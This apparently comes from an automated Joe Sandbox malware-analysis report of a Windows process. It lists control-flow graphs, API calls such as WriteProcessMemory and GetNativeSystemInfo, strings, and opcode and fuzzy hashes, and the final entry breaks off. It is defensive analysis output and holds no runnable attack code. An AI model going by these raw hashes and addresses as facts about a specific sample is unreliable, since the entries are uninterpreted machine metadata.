                                                                        • Opcode ID: 10febd13c96aef42730f9a900296ab6187e60375cf0863c5732a3c2d2438df5b
                                                                        • Instruction ID: 4a68989dee811e2334c8054fa2e455dd52e2067825ffd53898345bc1f9512b90
                                                                        • Opcode Fuzzy Hash: 10febd13c96aef42730f9a900296ab6187e60375cf0863c5732a3c2d2438df5b
                                                                        • Instruction Fuzzy Hash: 46E04831B44209AEEF05DBD0D803FAEBBF5E784710F6041B9B114615E1C674D845D627

                                                                        Execution Graph

                                                                        Execution Coverage:1.5%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:248
                                                                        Total number of Limit Nodes:25
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000971000.00000020.00000001.01000000.00000007.sdmp, Offset: 00971000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_971000_windows10.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ab534339ebf2f26df59a6dabcf4891875b70cb508f85659e8086122488c55be5
                                                                        • Instruction ID: 051481fce150fa8a1a80cea67762505c7b3fa195550938b0d6a995828549e412
                                                                        • Opcode Fuzzy Hash: ab534339ebf2f26df59a6dabcf4891875b70cb508f85659e8086122488c55be5
                                                                        • Instruction Fuzzy Hash: F7A012104088000BC444A7184C4350F35806D81210FC40214B45CA5282E606856803D7

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GlobalAddAtomW.KERNEL32(00000000), ref: 00B99350
                                                                          • Part of subcall function 00B99070: SetErrorMode.KERNELBASE(00008000), ref: 00B99084
                                                                          • Part of subcall function 00B99070: SetErrorMode.KERNELBASE(?,00B990D0), ref: 00B990C3
                                                                          • Part of subcall function 00C2E394: LoadIconW.USER32(00C54040,MAINICON,?,?,?,00B99410), ref: 00C2E4BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000B4D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_b4d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$AtomGlobalIconLoad
                                                                        • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$DelphiRM_GetObjectInstance$USER32
                                                                        • API String ID: 1953398334-1139167764
                                                                        • Opcode ID: 7089b5749a4869b0ceda104c47f737667e29058e792788f16f9e07e3319035ab
                                                                        • Instruction ID: a5ec34f5ec896568a69868311cd8afcabe63df685fced1378d8c57f60d2c8dea
                                                                        • Opcode Fuzzy Hash: 7089b5749a4869b0ceda104c47f737667e29058e792788f16f9e07e3319035ab
                                                                        • Instruction Fuzzy Hash: EC415C796003459FCB51EFB8EC82B9D77E4EB58300B4084B9F414E7372EA34A945CB61

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • __RTC_Initialize.LIBCMT ref: 00C7A86C
                                                                        • __mtterm.LIBCMT ref: 00C7A88F
                                                                          • Part of subcall function 00C7B649: TlsFree.KERNEL32(00C8C65C,00C7A8F6), ref: 00C7B674
                                                                        • __setenvp.LIBCMT ref: 00C7A89F
                                                                        • __cinit.LIBCMT ref: 00C7A8AA
                                                                        • __mtterm.LIBCMT ref: 00C7A8F1
                                                                        • __freeptd.LIBCMT ref: 00C7A961
                                                                          • Part of subcall function 00C7B615: TlsGetValue.KERNEL32(?,00C7B784), ref: 00C7B61E
                                                                          • Part of subcall function 00C7B615: TlsSetValue.KERNEL32(00000000), ref: 00C7B63F
                                                                          • Part of subcall function 00C7D6AF: __calloc_impl.LIBCMT ref: 00C7D6C0
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Value__mtterm$FreeInitialize__calloc_impl__cinit__freeptd__setenvp
                                                                        • String ID:
                                                                        • API String ID: 2350678278-0
                                                                        • Opcode ID: 740a37182b5d6dbb907ca612125e5b94fed63eab136fdeaf0953b735bfb92d47
                                                                        • Instruction ID: 9e7686e36703a4f94311e4f6a19ec13855871cd9ca3f48d0be9e649b06c2dac7
                                                                        • Opcode Fuzzy Hash: 740a37182b5d6dbb907ca612125e5b94fed63eab136fdeaf0953b735bfb92d47
                                                                        • Instruction Fuzzy Hash: A721B532504642999B297BB65C0372E37A89FD4764F20C53AFA2DD10E2FF20C943B667

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 00C79A18
                                                                          • Part of subcall function 00C7C0B6: __FF_MSGBANNER.LIBCMT ref: 00C7C0D9
                                                                          • Part of subcall function 00C7C0B6: __NMSG_WRITE.LIBCMT ref: 00C7C0E0
                                                                          • Part of subcall function 00C7C0B6: RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 00C7C12D
                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 00C79A3B
                                                                          • Part of subcall function 00C79994: std::exception::exception.LIBCMT ref: 00C799A0
                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00C79A4F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                        • String ID: PU'
                                                                        • API String ID: 832318072-4254717615
                                                                        • Opcode ID: 5db91140ad9be5fa89ba76169fa805d30b553dbff35875293046e9e3ab277b66
                                                                        • Instruction ID: dcb477dc11fed9ab8304cdc5fe4bf2686f6bca1dc7ea90decc32f69c0f3935fe
                                                                        • Opcode Fuzzy Hash: 5db91140ad9be5fa89ba76169fa805d30b553dbff35875293046e9e3ab277b66
                                                                        • Instruction Fuzzy Hash: 00014C3140430A6A8F24BB66D842ABD37E8DB90378B14C039F81D87192EB71DE42E795

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000002,00000000), ref: 00C2D266
                                                                        Strings
                                                                        • layout text, xrefs: 00C2D297
                                                                        • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00C2D250
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000B4D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_b4d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                        • API String ID: 71445658-2652665750
                                                                        • Opcode ID: c97f27ef7d8aa72474348f5b5c105c4ece938b484780acdacf72108639888d8d
                                                                        • Instruction ID: b40c1d47739de81aab5c3947b177a1c422462d404957ca338276b57dc2bf1ea1
                                                                        • Opcode Fuzzy Hash: c97f27ef7d8aa72474348f5b5c105c4ece938b484780acdacf72108639888d8d
                                                                        • Instruction Fuzzy Hash: 88414574A00218AFDB11DF98D982BAEB7F9EB49700F5040A4E905E7751E730EF00CB62

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008000), ref: 00B99084
                                                                        • SetErrorMode.KERNELBASE(?,00B990D0), ref: 00B990C3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000B4D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_b4d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID: imm32.dll
                                                                        • API String ID: 2340568224-1815517138
                                                                        • Opcode ID: 7b31b3ca2d3d56708ec54e4721e49acf33907f1f202250a25360c77bb4a61243
                                                                        • Instruction ID: ab5bbfb35947d8730d45f7678543ebcec5dc83cf8237dfd5978dc2764dd5638c
                                                                        • Opcode Fuzzy Hash: 7b31b3ca2d3d56708ec54e4721e49acf33907f1f202250a25360c77bb4a61243
                                                                        • Instruction Fuzzy Hash: E0F02775508304AFDB51EB68EC02B2977E8D345B11F91C0F9F41C93AA0D6759950DB30

                                                                        Control-flow Graph
                                                                        control_flow_graph 236 c2e394-c2e3a1 237 c2e3a3 236->237 238 c2e3ab-c2e3c1 236->238 237->238 240 c2e3c3-c2e3d2 238->240 241 c2e3d8-c2e3e2 238->241 240->241 242 c2e3f2-c2e3fc 241->242 243 c2e3e4-c2e3ec 241->243 244 c2e3fe-c2e406 242->244 245 c2e40c-c2e516 call b6a890 call b73ea0 LoadIconW call b74338 242->245 243->242 244->245 258 c2e526-c2e537 245->258 259 c2e518-c2e51b 245->259 261 c2e539 258->261 262 c2e53e-c2e56c call c23c28 258->262 259->258 261->262 267 c2e571-c2e586 262->267 268 c2e588-c2e58a call c2e7d8 267->268 269 c2e58f-c2e5db call c31304 call c31f70 267->269 268->269 275 c2e5ec-c2e5f3 269->275 276 c2e5dd-c2e5e9 269->276 276->275
                                                                        APIs
                                                                        • LoadIconW.USER32(00C54040,MAINICON,?,?,?,00B99410), ref: 00C2E4BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000B4D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_b4d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoad
                                                                        • String ID: MAINICON
                                                                        • API String ID: 2457776203-2283262055
                                                                        • Opcode ID: 6d64830c4a3b51380fc8a04a86404d9d5a8f46b1955a185def850359e565561c
                                                                        • Instruction ID: 11a829a27d5e459eac02b001c1153afa85d98e5f17fd346a1d7410dc46ec200d
                                                                        • Opcode Fuzzy Hash: 6d64830c4a3b51380fc8a04a86404d9d5a8f46b1955a185def850359e565561c
                                                                        • Instruction Fuzzy Hash: 62611B705043948FDB51EF68D886B897BE5AB05304F0880B9EC48DF357DBB59A88CB61

                                                                        Control-flow Graph
                                                                        control_flow_graph 278 99af3c-99af87 GetFileVersionInfoSizeW 282 99af89-99afba GetFileVersionInfoW 278->282 283 99affc-99b011 278->283 287 99afbc-99afd4 282->287 288 99afdf-99aff4 282->288 287->288 291 99afd6-99afdc 287->291 291->288
                                                                        APIs
                                                                        • GetFileVersionInfoSizeW.KERNELBASE(00000000), ref: 0099AF7E
                                                                        • GetFileVersionInfoW.KERNELBASE(00000000), ref: 0099AFB3
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.000000000098B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0098B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_98b000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: FileInfoVersion$Size
                                                                        • String ID:
                                                                        • API String ID: 2104008232-0
                                                                        • Opcode ID: f6b6862bc8111e6bbef38a72355977c2207b142c41cd2dc56a504daf2a15095f
                                                                        • Instruction ID: 98e20a9044858d4e51e1455a471d23927e90326588bb4a6914d8113eebe33e57
                                                                        • Opcode Fuzzy Hash: f6b6862bc8111e6bbef38a72355977c2207b142c41cd2dc56a504daf2a15095f
                                                                        • Instruction Fuzzy Hash: 54214F72A00609AFDF11EFA8CD92DAEB7FCEB89700B518475B514E3651EB349E00DA61

                                                                        Control-flow Graph
                                                                        control_flow_graph 292 c27b98-c27bba 293 c27c2c-c27c34 292->293 294 c27bbc-c27bc9 call c2cee4 292->294 296 c27c36-c27c38 call c196d4 293->296 297 c27c3d-c27c41 293->297 294->293 302 c27bcb-c27bcf 294->302 296->297 300 c27c43-c27c45 297->300 301 c27c4d 297->301 303 c27c47-c27c4b 300->303 304 c27c4f-c27c57 300->304 301->304 305 c27bd1-c27be3 call c2ced0 302->305 303->301 303->304 306 c27c62-c27c64 304->306 307 c27c59-c27c5b 304->307 315 c27c26-c27c2a 305->315 316 c27be5-c27bf3 call c2ced0 305->316 309 c27d31-c27d3a call b92cf8 306->309 310 c27c6a-c27c6e 306->310 307->306 322 c27d4b-c27d52 309->322 323 c27d3c-c27d46 call b92928 KiUserCallbackDispatcher 309->323 313 c27c70-c27c77 310->313 314 c27c7d-c27c87 310->314 313->309 313->314 318 c27c92-c27c96 314->318 319 c27c89-c27c90 314->319 315->293 315->305 316->315 333 c27bf5-c27c21 316->333 320 c27c98-c27ca1 call b92cf8 318->320 321 c27d0c-c27d13 318->321 319->318 319->320 320->322 337 c27ca7-c27cc3 call b92928 320->337 321->322 330 c27d15-c27d1e call b92cf8 321->330 328 c27d54-c27d58 call c295c0 322->328 329 c27d5d-c27d6b call c27ad0 322->329 323->322 328->329 340 c27db2-c27dc7 329->340 341 c27d6d-c27d71 329->341 330->322 343 c27d20-c27d2f call b92928 330->343 333->315 358 c27cc5-c27ccc call bdd2a4 337->358 359 c27cfa-c27d0a call b92928 call c196d4 337->359 341->340 344 c27d73-c27d77 341->344 343->322 344->340 348 c27d79-c27dad call b92928 call b8ab94 * 2 344->348 348->340 368 c27ce1-c27cf4 call b92928 358->368 369 c27cce-c27cd6 358->369 359->322 368->359 369->368 371 c27cd8-c27cdf 369->371 371->359 371->368
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(00000000,00000000,00000000,00C27DC8), ref: 00C27D46
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000B4D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_b4d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: 3a55169b5a2e209b12851487324187aef34270f8efea316ecd8d126837c331c3
                                                                        • Instruction ID: 799ed56bb1caf5dd1a6dd67216b80e5d1792a804041c1f0e98de78c8e7512869
                                                                        • Opcode Fuzzy Hash: 3a55169b5a2e209b12851487324187aef34270f8efea316ecd8d126837c331c3
                                                                        • Instruction Fuzzy Hash: 1951B3306083605BDB25AB38ECC57AE37D4AF45700F0896B5FC559BA97DA74CE448750

                                                                        Control-flow Graph
                                                                        control_flow_graph 375 c4a114-c4a121 376 c4a127-c4a1a6 375->376 377 c4a3be-c4a3c4 375->377 382 c4a1b2-c4a1d1 376->382 383 c4a1a8-c4a1ad GetNativeSystemInfo 376->383 384 c4a1e5-c4a232 382->384 385 c4a1d3-c4a1da 382->385 383->382 386 c4a237-c4a24e 384->386 385->386 387 c4a1dc-c4a1e3 385->387 390 c4a254-c4a255 386->390 391 c4a33d-c4a345 386->391 387->384 387->386 390->377 392 c4a25b-c4a263 390->392 393 c4a347 391->393 394 c4a34e-c4a35d 391->394 395 c4a265 392->395 396 c4a276-c4a27e 392->396 397 c4a35f-c4a36e 393->397 398 c4a349-c4a34a 393->398 394->377 399 c4a267-c4a268 395->399 400 c4a2a8-c4a2b0 395->400 401 c4a294-c4a2a3 396->401 402 c4a280-c4a28f 396->402 397->377 403 c4a370-c4a378 398->403 404 c4a34c 398->404 406 c4a2da-c4a2e2 399->406 407 c4a26a-c4a26b 399->407 409 c4a2c6-c4a2d5 400->409 410 c4a2b2-c4a2c1 400->410 401->377 402->377 411 c4a393-c4a39c 403->411 412 c4a37a-c4a380 403->412 404->377 413 c4a2e4-c4a2f3 406->413 414 c4a2f8-c4a307 406->414 415 c4a271 407->415 416 c4a30c-c4a313 407->416 409->377 410->377 424 c4a39e-c4a3ad 411->424 425 c4a3af-c4a3b4 411->425 412->411 419 c4a382-c4a391 412->419 413->377 414->377 415->377 429 c4a315-c4a324 416->429 430 c4a329-c4a338 416->430 419->377 424->377 425->377 429->377 430->377
                                                                        APIs
                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00C4A1AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000C4A000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C4A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c4a000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: InfoNativeSystem
                                                                        • String ID:
                                                                        • API String ID: 1721193555-0
                                                                        • Opcode ID: a5a29aea8d9572a7f27ed8afb4546fd9580458094ca71e436b27364b3cee5199
                                                                        • Instruction ID: 7cebaa0531d8d0f83ad5bdfcb22eaa880d5ae51ccfee939ce63de4681adbfe99
                                                                        • Opcode Fuzzy Hash: a5a29aea8d9572a7f27ed8afb4546fd9580458094ca71e436b27364b3cee5199
                                                                        • Instruction Fuzzy Hash: 4561C4782483448BDB24DF28D90176E7BF1BB94305FA08D2AE4959B275E671CA89CB03

                                                                        Control-flow Graph
                                                                        control_flow_graph 434 c2d5d8-c2d5f0 435 c2d5f2-c2d5fe 434->435 436 c2d601-c2d616 434->436 435->436 437 c2d624-c2d639 436->437 438 c2d618-c2d61f call c30d6c 436->438 441 c2d653-c2d662 call b6acf0 437->441 442 c2d63b-c2d651 call b6acf0 437->442 438->437 448 c2d667-c2d688 SystemParametersInfoW 441->448 442->448 450 c2d6f0-c2d737 call b6ae28 call b6acf0 * 3 448->450 451 c2d68a-c2d6ee call b6acf0 * 4 448->451 471 c2d73c-c2d780 call b6aa7c * 3 450->471 451->471 481 c2d782-c2d78b call c30d6c 471->481 482 c2d790 471->482 481->482
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32(00000029,00000000,?,00000000,?,00000000,00C1F730,?,00C2CC47,00000000,00000000,00C2783C,6E6F4646,?,?,00000000), ref: 00C2D681
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000B4D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_b4d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: InfoParametersSystem
                                                                        • String ID:
                                                                        • API String ID: 3098949447-0
                                                                        • Opcode ID: 2869844d3993d529d54f2b1abd51753683ffe54495902b23fb49df1822e49473
                                                                        • Instruction ID: a6f875939bc48000440a29f8f4633d97e6fe21f427f2f5a19a65052441e0a94e
                                                                        • Opcode Fuzzy Hash: 2869844d3993d529d54f2b1abd51753683ffe54495902b23fb49df1822e49473
                                                                        • Instruction Fuzzy Hash: 9D4145346002149BDB50FB78DC86B9A33E9EF45B00F5480B1B90CEB757EE38AD858B65

                                                                        Control-flow Graph
                                                                        control_flow_graph 484 c6b7b0-c6b7d9 485 c6b805-c6b80b 484->485 486 c6b7db 484->486 487 c6b7e2-c6b804 WriteProcessMemory 486->487 488 c6b7dd-c6b7e0 486->488 488->485 488->487
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,000000FF,?,?,00000005,00000000), ref: 00C6B7F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C6B000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C6B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c6b000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: f724551797df3d079ec7630f68a98d8fc8fbe16478561887b9490916555449d7
                                                                        • Instruction ID: 9a9bccce28412c8eff8714e13637333a38800fa4fdb79fe6dd24b8a7a3408847
                                                                        • Opcode Fuzzy Hash: f724551797df3d079ec7630f68a98d8fc8fbe16478561887b9490916555449d7
                                                                        • Instruction Fuzzy Hash: 30F02B7174020D26DB244C7C9C41BAEB79ACBC2630F158369B925C72D4E5708C454291

                                                                        Control-flow Graph
                                                                        control_flow_graph 489 c2cffc-c2d019 491 c2d01e-c2d021 489->491 492 c2d023-c2d026 491->492 493 c2d030 491->493 492->493 494 c2d028-c2d02e 492->494 495 c2d032-c2d04d LoadCursorW call c2d17c 493->495 494->495 495->491 498 c2d04f-c2d053 495->498
                                                                        APIs
                                                                        • LoadCursorW.USER32(00000000,00000000,?,?,?,00C1F730,00C2CB5F,?,?,00000000,?,00B993F0), ref: 00C2D036
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000B4D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_b4d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: CursorLoad
                                                                        • String ID:
                                                                        • API String ID: 3238433803-0
                                                                        • Opcode ID: 594fe75da452fb86f21a349871e2d216a89d14f617c79b6fa7bd71b23a0fd236
                                                                        • Instruction ID: 249875b5b184149af2bacb2aa1d2f8e9d418c61da43a1e4750b660ed90a4cab2
                                                                        • Opcode Fuzzy Hash: 594fe75da452fb86f21a349871e2d216a89d14f617c79b6fa7bd71b23a0fd236
                                                                        • Instruction Fuzzy Hash: CAF0A751A0525017A660593D6CC0F6EB244CBD6731F304336F93F976E1CA211C461750

                                                                        Control-flow Graph
                                                                        control_flow_graph 499 b894b0-b894f7 KiUserCallbackDispatcher
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00B894EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4177483806.0000000000B4D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B4D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_b4d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: 5535dc279ff1e877384e686dd9023c36d18ece0e40eb3ee833c40a88ae434141
                                                                        • Instruction ID: e0bbe715bca3811110881742a92ef003db1fcb23f4917bcbe1fd8e336695c67c
                                                                        • Opcode Fuzzy Hash: 5535dc279ff1e877384e686dd9023c36d18ece0e40eb3ee833c40a88ae434141
                                                                        • Instruction Fuzzy Hash: D4F0DA762047119FC310DF5CC88494BB7E9EF89259F044A59F986DB351C771E814CB92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4463870463.0000000001162000.00000020.00000001.01000000.00000007.sdmp, Offset: 01162000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_1162000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: =
                                                                        • API String ID: 0-2322244508
                                                                        • Opcode ID: 8747d4d4a66007d555ded7271ff69db9a91538b04c7af679efe992322c3592e5
                                                                        • Instruction ID: 28de614562fc74e0ab731e6e8400da1cbec864be83a84a95c5042968d3720471
                                                                        • Opcode Fuzzy Hash: 8747d4d4a66007d555ded7271ff69db9a91538b04c7af679efe992322c3592e5
                                                                        • Instruction Fuzzy Hash: 6EF05C11968146DFC721CA3484C0B777BE1CF95351F21976CB49A8B681D27A4C0AE610
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4463870463.0000000000D47000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D47000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_d47000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9a9670c049b1ee754d8e48c2c420078231842d0213a469bb1e1e388e4a719760
                                                                        • Instruction ID: 66d319f7d3a0c5efd40dae16d372b4e5743597afe982b0dbe8425b693505ba46
                                                                        • Opcode Fuzzy Hash: 9a9670c049b1ee754d8e48c2c420078231842d0213a469bb1e1e388e4a719760
                                                                        • Instruction Fuzzy Hash: 05D05E31764012CFC702DF08DCC4E9C7369AF163057A44091F548CB65AC320A817CB80
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000100,?,?,?,?,?,?), ref: 00C7F25A
                                                                        • _malloc.LIBCMT ref: 00C7F293
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00000000,00C79E02,?,?), ref: 00C7F2C6
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00C79E02,?,?), ref: 00C7F2E2
                                                                        • MultiByteToWideChar.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00C7F31C
                                                                        • _malloc.LIBCMT ref: 00C7F355
                                                                        • __freea.LIBCMT ref: 00C7F3AD
                                                                        • __freea.LIBCMT ref: 00C7F3B6
                                                                        • _malloc.LIBCMT ref: 00C7F46B
                                                                        • _memset.LIBCMT ref: 00C7F48D
                                                                        • __freea.LIBCMT ref: 00C7F4D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__freea_malloc$_memset
                                                                        • String ID:
                                                                        • API String ID: 3920393152-0
                                                                        • Opcode ID: 0de52c12a0e513ca47024b8f87f90e9ebe59b9d00e482156c1ac46fbe9fb12a9
                                                                        • Instruction ID: fde2546d469af2a3b13b2e5424b9babe7dc7dc0969254f4e963df7bd67f6bdb0
                                                                        • Opcode Fuzzy Hash: 0de52c12a0e513ca47024b8f87f90e9ebe59b9d00e482156c1ac46fbe9fb12a9
                                                                        • Instruction Fuzzy Hash: 3BB18F7280011AEFDF219FA4CCC18AE7BA5FF48354F14853EF929A6161D7358E52EB60
                                                                        APIs
                                                                        • TlsSetValue.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C7A861), ref: 00C7BA60
                                                                        • __init_pointers.LIBCMT ref: 00C7BA6A
                                                                        • __mtterm.LIBCMT ref: 00C7BB20
                                                                          • Part of subcall function 00C7B649: TlsFree.KERNEL32(00C8C65C,00C7A8F6), ref: 00C7B674
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: FreeValue__init_pointers__mtterm
                                                                        • String ID: FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                        • API String ID: 3928193026-1030280904
                                                                        • Opcode ID: 1991ad417bacbd9d2802aaa7dad2636fce703af6eeaaef0768100332f19d3d18
                                                                        • Instruction ID: eec5102a1909b743b3cd3cdcbdeb5b4068284b70a383b86518a77f6d382c5892
                                                                        • Opcode Fuzzy Hash: 1991ad417bacbd9d2802aaa7dad2636fce703af6eeaaef0768100332f19d3d18
                                                                        • Instruction Fuzzy Hash: 63318D718007119AC7557B75AD09B5F3BE4ABC4324B20C53FF928D71B2EB748943AB68
                                                                        APIs
                                                                        • _strlen.LIBCMT ref: 00C82355
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,00000000,00000000,?,?,?,?,?,00C7F75E), ref: 00C82395
                                                                        • _malloc.LIBCMT ref: 00C823A5
                                                                        • _memset.LIBCMT ref: 00C823CD
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,00000000,?,?,?,?,?,00C7F75E,?), ref: 00C823E4
                                                                        • __freea.LIBCMT ref: 00C8246C
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__freea_malloc_memset_strlen
                                                                        • String ID:
                                                                        • API String ID: 3923921168-0
                                                                        • Opcode ID: f9f579952a43ae0d88b08964d036b2908c402aefef08478c8f4afd124e883fd8
                                                                        • Instruction ID: db0e992b003217ba4e12b672d0c1fca4e04dfca883402190996ad56d5dedcbac
                                                                        • Opcode Fuzzy Hash: f9f579952a43ae0d88b08964d036b2908c402aefef08478c8f4afd124e883fd8
                                                                        • Instruction Fuzzy Hash: 15516E31900219AECF21AFA5DC48DEFBBB9EF89724F204119F524B6160D7359D41DBB8
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4454342711.0000000000C79000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C79000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_c79000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: String___crt$Type_memset
                                                                        • String ID:
                                                                        • API String ID: 1957702402-3916222277
                                                                        • Opcode ID: 986dee7bea969a3714e358a5090ab71fdb8d9d34e61384a774763969e3de55ca
                                                                        • Instruction ID: bf848ec0511de1e0f192c656ad752c8251d9f0b684f327dedab134429517a327
